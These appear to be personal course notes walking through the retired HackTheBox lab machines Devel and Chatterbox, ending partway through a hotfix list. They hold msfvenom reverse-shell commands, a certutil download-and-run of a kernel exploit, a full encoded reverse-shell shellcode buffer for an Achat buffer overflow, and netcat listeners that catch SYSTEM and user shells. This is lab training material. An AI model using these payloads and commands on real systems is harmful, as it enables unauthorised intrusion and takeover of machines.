# TCM Course - Windows Privilege Escalation - Part 1

###### tags: `windows` `privesc` `OSCP` `ActiveDirectory`

{%hackmd theme-dark %}

Course: https://academy.tcm-sec.com/courses/1154361/lectures/24795072

Note: this is split into two parts because the HackMD limit is 10000 characters per note, and this goes over it x)

## Kernel Exploits - Devel

### Access to the machine

Anonymous access to FTP, which is serving the website, so a reverse shell in ASPX can be uploaded there:

`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8888 -f aspx > manual.aspx`

### Enumerating

* https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Note: it throws a lot of errors because of obsolete Python2-related code, so try this PR instead: https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py

Update the DB:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Devel/Windows-Exploit-Suggester]
└─$ python2 windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2022-11-14-mssb.xls
[*] done
```

Run `systeminfo` on the target:

```bash
c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          13/11/2022, 11:14:49
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.455 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.530 MB
Virtual Memory: In Use:    611 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::10d5:9590:d613:ebd5
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e
```

And running it (no hotfixes at all, so every bulletin for this build stays on the list):

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Devel]
└─$ python windows-exploit-suggester.py --database 2022-11-14-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
```

For example, I picked MS11-011.
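What the suggester does with that output is simple enough to show in a few lines. The parser below is an added example (not from this note and not the tool's own code): it reads a `systeminfo` dump, pulls out the version, architecture and `KBxxxx` list, and diffs the hotfixes against the KB numbers printed in parentheses in the suggester output above. `BULLETIN_KB` is a hand-picked subset of those, not the full bulletin spreadsheet, and both inputs are constructed, trimmed dumps.

```python
"""Parse `systeminfo` output and diff the installed hotfixes against the KB
numbers that fix a few bulletins. Added example, not part of the original
note or of Windows-Exploit-Suggester; BULLETIN_KB is a hand-picked subset
copied from the suggester output on this page, not the full database, and
the two samples below are constructed (trimmed) systeminfo dumps."""
import re

BULLETIN_KB = {
    "MS10-015": "KB977165",
    "MS10-059": "KB982799",
    "MS11-011": "KB2393802",
    "MS15-051": "KB3057191",
    "MS16-016": "KB3136041",
    "MS16-135": "KB3199135",
}

HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$")
FIELD_RE = re.compile(r"^([A-Za-z][^:]*?):\s*(.*)$")

DEVEL = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 IP address(es)
                                 [01]: 10.10.10.5
"""

PATCHED = """\
Host Name:                 LAB
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB3057191
                           [03]: KB3199135
"""


def parse_systeminfo(text):
    """Return (os_name, (major, minor, build), arch, set of KB ids).

    Hotfixes are the only '[NN]: ...' lines whose value is a KB number, so
    NIC and IP entries in the same shape are ignored. 'N/A' (Devel) means
    nothing installed at all."""
    fields, hotfixes = {}, set()
    for line in text.splitlines():
        m = HOTFIX_RE.match(line)
        if m:
            hotfixes.add(m.group(1))
            continue
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", fields.get("OS Version", ""))
    version = tuple(int(x) for x in m.groups()) if m else None
    arch = "x64" if "x64" in fields.get("System Type", "").lower() else "x86"
    return fields.get("OS Name", ""), version, arch, hotfixes


def missing_bulletins(hotfixes, table=BULLETIN_KB):
    """Bulletins whose fixing KB is not in the hotfix list. Caveat: a later
    cumulative update supersedes these KBs without listing them, so treat
    the result as candidates to test on the box, not as confirmed holes."""
    return sorted(b for b, kb in table.items() if kb not in hotfixes)


if __name__ == "__main__":
    for dump in (DEVEL, PATCHED):
        name, ver, arch, hf = parse_systeminfo(dump)
        print(name, ver, arch, len(hf), "hotfix(es) ->", missing_bulletins(hf))
```

With zero hotfixes, as on Devel, every bulletin for the build is a candidate, which is exactly why the list above is 179 entries long. The caveat in `missing_bulletins` is the one that bites in practice: Windows 7 roll-ups supersede older KBs without listing them, so a bulletin the suggester reports as missing still has to be tried on the machine.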
Here https://www.exploit-db.com/exploits/11199 tells me there's an exploit at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip

We can't try this one because it pops a new SYSTEM shell as a GUI window, and we're in a console.

MS10-059 looks like it would work: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

```bash
c:\inetpub\wwwroot>Churraskito.exe
Churraskito.exe
This program cannot be run in DOS mode.

c:\inetpub\wwwroot>Churraskito.exe "C:\Windows\system32\cmd.exe" "net user 123 123 /add"
Churraskito.exe "C:\Windows\system32\cmd.exe" "net user 123 123 /add"
This program cannot be run in DOS mode.
```

Sad. It seems this Churraskito is based on another one called Chimichurri, which gives a revshell. That one fails the same way, but it works for the course instructor. _Press F to say F_

OK, the problem is the FTP: the upload went in ASCII mode, which rewrites line endings and corrupts the .exe (that "This program cannot be run in DOS mode" text is the PE's DOS stub running, which only happens when the PE header has been mangled). Typing `binary` in the ftp client before `put` avoids it; here I just switched to a different upload path.

```bash
C:\Windows\Temp>certutil.exe -urlcache -f http://10.10.14.3/MS10-059.exe ms10-059.exe
certutil.exe -urlcache -f http://10.10.14.3/MS10-059.exe ms10-059.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Windows\Temp>ms10-059.exe
ms10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Windows\Temp>
```

Now both of them work; it was the FTP converting the .exe to plaintext. I uploaded them with certutil.exe and Python's http.server. On the target:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Devel]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.5] 49247
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
c:\windows\system32\inetsrv>cd C:\Windows\Temp
cd C:\Windows\Temp

C:\Windows\Temp>ms10-059.exe 10.10.14.3 8876
ms10-059.exe 10.10.14.3 8876
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
```

On our machine:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/Devel]
└─$ nc -nlvp 8876
listening on [any] 8876 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.5] 49253
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\Temp>whoami
whoami
nt authority\system
```

## Password Hunting and Port Forwarding - Chatterbox

### Access to the machine

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ sudo nmap -T5 -A -p135,139,445,9255,9256,49152,49153,49154,49155,49156,49157 10.10.10.74 -oN nmap.out
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 16:29 CET
Nmap scan report for 10.10.10.74
Host is up (0.055s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008
OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows Server 2008 SP1
Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h40m01s, deviation: 2h53m14s, median: 5h00m00s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2022-11-14T20:30:54
|_  start_date: 2022-11-14T20:18:39
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-11-14T15:30:56-05:00

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   64.87 ms 10.10.14.1
2   65.04 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.34 seconds
```

The guest password is blank (nmap's `account_used: guest` above got in that way); any other password gives `NT_STATUS_LOGON_FAILURE`.
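The Achat overflow used in this section needs a payload that survives the service widening the received bytes to UTF-16, which is why the msfvenom command below uses `x86/unicode_mixed` and marks NUL plus everything from `0x80` up as bad characters. The checker here is an added example, not part of this note or of the exploit-db script: it validates a buffer against that badchar set and models the widening. The `cp1252` code page is an assumption for the demo (the real mapping depends on the target's ANSI code page); the sample is the first three lines of the encoded payload shown further down.

```python
"""Checks for the Achat payload: added example, not from the original note or
from the exploit-db script. The service widens the bytes it receives to
UTF-16, so a usable payload must contain no NUL and nothing >= 0x80 (the
badchar list passed to msfvenom), which is what x86/unicode_mixed produces.
The cp1252 code page used below to model that widening is an assumption."""

# Same badchar set as the msfvenom command in this section.
BADCHARS = frozenset([0x00] + list(range(0x80, 0x100)))

# Constructed sample: the first three `buf +=` lines of the encoded payload.
SAMPLE = (b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
          b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
          b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41")


def find_badchars(buf, badchars=BADCHARS):
    """Return [(offset, byte), ...] for every forbidden byte in buf.
    NUL is on the list because it terminates the string on the target,
    not because of the widening."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def is_unicode_safe(buf, badchars=BADCHARS):
    return not find_badchars(buf, badchars)


def as_target_sees_it(buf, codepage="cp1252"):
    """Model the ANSI -> UTF-16LE widening done on the target. Bytes below
    0x80 come out as 'XX 00' (the interleaved NUL the unicode decoder stub
    is written to tolerate); bytes from 0x80 up are remapped by the code
    page, so shellcode containing them would not survive. Bytes the code
    page does not define become U+FFFD."""
    return buf.decode(codepage, errors="replace").encode("utf-16-le")


def survives_widening(buf):
    """True if dropping the inserted high bytes gives back the original."""
    wide = as_target_sees_it(buf)
    return wide[0::2] == buf and all(b == 0 for b in wide[1::2])


if __name__ == "__main__":
    print("sample ok:", is_unicode_safe(SAMPLE), survives_widening(SAMPLE))
    print("bad bytes in b'A\\x00\\x80':", find_badchars(b"A\x00\x80"))
    print("0x80 after widening:", as_target_sees_it(b"\x80").hex())
```

`survives_widening` is the check to run on any buffer you hand to this kind of exploit: a byte of `0x80` comes back as `ac 20` (the euro sign in cp1252), not `80 00`, so the decoder stub would land on garbage. The `PPYAIAIA...` prefix of the sample is the unicode_mixed decoder stub itself, which is why every byte of it is plain ASCII.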
```bash
┌──(aml㉿kali)-[~]
└─$ searchsploit achat
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                    | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                       | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities          | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                            | php/webapps/24647.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
```

Creating the revshell for the BoF. The encoder and the badchar list are the ones the exploit script asks for: the payload is run through `x86/unicode_mixed` with NUL and every byte from `0x80` up excluded, so it survives the service's unicode conversion.

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8877 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: previous definition of NAME was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::PREFERENCE
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:12: warning: previous definition of PREFERENCE was here
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::IDENTIFIER
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:13: warning: previous definition of IDENTIFIER was here
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x38\x68\x44\x42"
buf += b"\x6d\x30\x49\x70\x4d\x30\x61\x50\x74\x49\x49\x55\x4e"
buf += b"\x51\x49\x30\x42\x44\x64\x4b\x42\x30\x70\x30\x64\x4b"
buf += b"\x70\x52\x7a\x6c\x44\x4b\x71\x42\x4d\x44\x42\x6b\x70"
buf += b"\x72\x4f\x38\x4c\x4f\x38\x37\x6d\x7a\x6b\x76\x6e\x51"
buf += b"\x6b\x4f\x34\x6c\x4d\x6c\x51\x51\x71\x6c\x4c\x42\x4c"
buf += b"\x6c\x6f\x30\x67\x51\x76\x6f\x4c\x4d\x4a\x61\x76\x67"
buf += b"\x6b\x32\x49\x62\x4e\x72\x4e\x77\x54\x4b\x70\x52\x6c"
buf += b"\x50\x72\x6b\x50\x4a\x4f\x4c\x44\x4b\x70\x4c\x4e\x31"
buf += b"\x74\x38\x4a\x43\x6e\x68\x79\x71\x58\x51\x72\x31\x64"
buf += b"\x4b\x62\x39\x4f\x30\x6a\x61\x49\x43\x72\x6b\x71\x39"
buf += b"\x4a\x78\x4b\x33\x6c\x7a\x71\x39\x52\x6b\x4c\x74\x52"
buf += b"\x6b\x5a\x61\x6a\x36\x50\x31\x49\x6f\x46\x4c\x47\x51"
buf += b"\x58\x4f\x6c\x4d\x4b\x51\x57\x57\x70\x38\x67\x70\x70"
buf += b"\x75\x68\x76\x39\x73\x51\x6d\x6b\x48\x6d\x6b\x51\x6d"
buf += b"\x6e\x44\x50\x75\x57\x74\x50\x58\x54\x4b\x72\x38\x4c"
buf += b"\x64\x79\x71\x59\x43\x42\x46\x42\x6b\x6a\x6c\x30\x4b"
buf += b"\x32\x6b\x42\x38\x6b\x6c\x49\x71\x76\x73\x34\x4b\x4d"
buf += b"\x34\x44\x4b\x4b\x51\x56\x70\x51\x79\x61\x34\x4d\x54"
buf += b"\x6c\x64\x31\x4b\x31\x4b\x63\x31\x52\x39\x31\x4a\x52"
buf += b"\x31\x69\x6f\x37\x70\x4f\x6f\x71\x4f\x4e\x7a\x72\x6b"
buf += b"\x5a\x72\x7a\x4b\x44\x4d\x61\x4d\x4f\x78\x6c\x73\x6c"
buf += b"\x72\x4d\x30\x6b\x50\x61\x58\x44\x37\x73\x43\x50\x32"
buf += b"\x4f\x6f\x51\x44\x42\x48\x70\x4c\x31\x67\x6e\x46\x49"
buf += b"\x77\x4b\x4f\x59\x45\x56\x58\x34\x50\x4b\x51\x4b\x50"
buf += b"\x4b\x50\x4c\x69\x65\x74\x50\x54\x32\x30\x31\x58\x4d"
buf += b"\x59\x71\x70\x72\x4b\x4d\x30\x79\x6f\x6a\x35\x42\x30"
buf += b"\x4e\x70\x42\x30\x72\x30\x4f\x50\x4e\x70\x31\x30\x6e"
buf += b"\x70\x52\x48\x68\x6a\x6c\x4f\x59\x4f\x49\x50\x4b\x4f"
buf += b"\x6a\x35\x54\x57\x31\x5a\x7a\x65\x4f\x78\x5a\x6a\x4b"
buf += b"\x5a\x4a\x6e\x6d\x33\x33\x38\x6a\x62\x69\x70\x4d\x52"
buf += b"\x66\x4d\x53\x59\x49\x56\x72\x4a\x4c\x50\x50\x56\x31"
buf += b"\x47\x4f\x78\x55\x49\x73\x75\x54\x34\x30\x61\x49\x6f"
buf += b"\x36\x75\x35\x35\x47\x50\x72\x54\x7a\x6c\x79\x6f\x50"
buf += b"\x4e\x39\x78\x72\x55\x7a\x4c\x52\x48\x78\x70\x45\x65"
buf += b"\x43\x72\x62\x36\x6b\x4f\x48\x55\x33\x38\x63\x33\x62"
buf += b"\x4d\x6f\x74\x4d\x30\x54\x49\x38\x63\x62\x37\x51\x47"
buf += b"\x50\x57\x4e\x51\x59\x66\x42\x4a\x6a\x72\x62\x39\x42"
buf += b"\x36\x49\x52\x4b\x4d\x33\x36\x59\x37\x6f\x54\x6c\x64"
buf += b"\x4f\x4c\x79\x71\x6a\x61\x74\x4d\x6d\x74\x6d\x54\x4e"
buf += b"\x30\x59\x36\x69\x70\x51\x34\x4f\x64\x6e\x70\x61\x46"
buf += b"\x51\x46\x30\x56\x4f\x56\x42\x36\x50\x4e\x70\x56\x50"
buf += b"\x56\x30\x53\x4f\x66\x30\x68\x72\x59\x68\x4c\x4f\x4f"
buf += b"\x33\x56\x69\x6f\x56\x75\x31\x79\x6b\x30\x6e\x6e\x42"
buf += b"\x36\x4f\x56\x49\x6f\x6e\x50\x30\x68\x4c\x48\x32\x67"
buf += b"\x4b\x6d\x73\x30\x69\x6f\x77\x65\x75\x6b\x78\x70\x36"
buf += b"\x55\x44\x62\x71\x46\x32\x48\x57\x36\x73\x65\x37\x4d"
buf += b"\x63\x6d\x59\x6f\x37\x65\x4f\x4c\x49\x76\x71\x6c\x6a"
buf += b"\x6a\x35\x30\x59\x6b\x57\x70\x63\x45\x79\x75\x37\x4b"
buf += b"\x31\x37\x4b\x63\x62\x52\x32\x4f\x32\x4a\x79\x70\x4f"
buf += b"\x63\x39\x6f\x79\x45\x41\x41"
```

Edited the BoF script, adding the revshell and the target IP, and:

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ python2 36025.py
---->{P00F}!
```

```bash
┌──(aml㉿kali)-[~/HTB/Retired/chatterbox]
└─$ nc -nlvp 8877
listening on [any] 8877 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Windows\system32>hostname
hostname
Chatterbox
```

### Enumerating

Systeminfo:

```bash
Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          11/14/2022, 4:22:38 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,597 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,650 MB
Virtual Memory: In Use:    445 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 183 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2830477
                           [06]: KB2592687
                           [07]: KB2479943
                           [08]: KB2491683
                           [09]: KB2506212
                           [10]: KB2506928
                           [11]: KB2509553
                           [12]: KB2533552
                           [13]: KB2534111
                           [14]: KB2545698
                           [15]: KB2547666
                           [16]: KB2552343
                           [17]: KB2560656
                           [18]: KB2563227
                           [19]: KB2564958
                           [20]: KB2574819
                           [21]: KB2579686
                           [22]: KB2604115
                           [23]: KB2620704
                           [24]: KB2621440
                           [25]: KB2631813
                           [26]: KB2639308
                           [27]: KB2640148
                           [28]: KB2647753
                           [29]: KB2654428
                           [30]: KB2660075
                           [31]: KB2667402
                           [32]: KB2676562
                           [33]: KB2685811
                           [34]: KB2685813
                           [35]: KB2690533
                           [36]: KB2698365
                           [37]: KB2705219
                           [38]: KB2719857
                           [39]: KB2726535
                           [40]: KB2727528
                           [41]: KB2729094
                           [42]: KB2732059
                           [43]: KB2732487
                           [44]: KB2736422
                           [45]: KB2742599
                           [46]: KB2750841
                           [47]: KB2761217
                           [48]: KB2763523
                           [49]: KB2770660
                           [50]: KB2773072
                           [51]: KB2786081
                           [52]: KB2799926
                           [53]: KB2800095
                           [54]: KB2807986
                           [55]: KB2808679
                           [56]: KB2813430
                           [57]: KB2820331
                           [58]: KB2834140
                           [59]: KB2840631
                           [60]: KB2843630
                           [61]: KB2847927
                           [62]: KB2852386
                           [63]: KB2853952
                           [64]: KB2857650
                           [65]: KB2861698
                           [66]: KB2862152
                           [67]: KB2862330
                           [68]: KB2862335
                           [69]: KB2864202
                           [70]: KB2868038
                           [71]: KB2871997
                           [72]: KB2884256
                           [73]: KB2891804
                           [74]: KB2892074
                           [75]: KB2893294
                           [76]: KB2893519
                           [77]: KB2894844
                           [78]: KB2900986
                           [79]: KB2908783
                           [80]: KB2911501
                           [81]: KB2912390
                           [82]: KB2918077
                           [83]: KB2919469
                           [84]: KB2923545
                           [85]: KB2931356
                           [86]: KB2937610
                           [87]: KB2943357
                           [88]: KB2952664
                           [89]: KB2966583
                           [90]: KB2968294
                           [91]: KB2970228
                           [92]: KB2972100
                           [93]: KB2973112
                           [94]: KB2973201
                           [95]: KB2973351
                           [96]: KB2977292
                           [97]: KB2978742
                           [98]: KB2984972
                           [99]: KB2985461
                           [100]: KB2991963
                           [101]: KB2992611
                           [102]: KB3003743
                           [103]: KB3004361
                           [104]: KB3004375
                           [105]: KB3006121
                           [106]: KB3006137
                           [107]: KB3010788
                           [108]: KB3011780
                           [109]: KB3013531
                           [110]: KB3020370
                           [111]: KB3020388
                           [112]: KB3021674
                           [113]: KB3021917
                           [114]: KB3022777
                           [115]: KB3023215
                           [116]: KB3030377
                           [117]: KB3035126
                           [118]: KB3037574
                           [119]: KB3042058
                           [120]: KB3045685
                           [121]: KB3046017
                           [122]: KB3046269
                           [123]: KB3054476
                           [124]: KB3055642
                           [125]: KB3059317
